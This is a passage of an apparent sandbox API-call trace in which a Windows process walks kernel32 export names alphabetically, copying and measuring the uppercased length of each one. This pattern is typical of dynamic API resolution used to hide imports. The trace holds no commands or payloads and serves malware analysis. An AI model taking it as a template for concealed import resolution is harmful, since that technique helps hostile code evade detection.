lpString1="CopyFileExW") returned="CopyFileExW" [0180.922] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.922] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.922] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.922] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.922] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.922] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.923] lstrlenA (lpString="COPYFILEW") returned 9 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.923] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.923] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.923] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.923] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.923] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.923] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.923] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.923] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.923] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.923] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.923] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.923] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.923] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.923] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.923] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.923] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.923] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.923] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.923] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.923] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.924] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.924] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.924] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.924] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0180.924] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.924] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0180.924] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.924] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.924] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.924] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.924] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.924] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.924] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.924] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.924] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.924] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.924] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.924] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.924] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.925] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.925] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.925] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.925] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.925] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.925] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.925] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.925] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.925] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.925] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.925] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.925] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.925] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.925] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.925] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.925] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0180.925] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.925] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.925] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.925] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.926] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.926] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.926] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.926] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.926] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.926] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.926] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.926] lstrlenA (lpString="CREATETHREAD") returned 12 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.926] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.926] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.926] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.926] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.926] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.926] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.926] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.926] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.926] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.926] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.926] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.927] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.927] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.927] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.927] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.927] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.927] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.927] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.927] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.927] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.927] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.927] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.927] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.927] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.927] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.927] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0180.927] lstrlenA (lpString="DELETEATOM") returned 10 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0180.927] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0180.927] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0180.927] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0180.928] lstrlenA (lpString="DELETEFIBER") returned 11 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0180.928] lstrlenA (lpString="DELETEFILEA") returned 11 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0180.928] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0180.928] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0180.928] lstrlenA (lpString="DELETEFILEW") returned 11 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0180.928] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0180.928] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0180.928] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0180.928] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0180.928] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0180.928] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0180.928] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0180.928] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0180.928] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0180.928] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0180.928] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0180.928] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0180.928] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0180.928] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0180.928] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0180.929] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0180.929] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0180.929] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0180.929] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0180.929] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0180.929] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0180.929] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0180.929] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0180.929] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0180.929] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0180.929] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0180.929] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0180.929] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0180.929] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0180.929] lstrcpyA (in: 